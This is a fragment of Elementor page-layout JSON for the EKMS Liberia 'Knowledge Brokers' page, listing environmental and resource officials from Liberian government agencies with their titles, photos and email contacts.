id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony A. Yokie<\\/strong><br \\/>Manager<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br 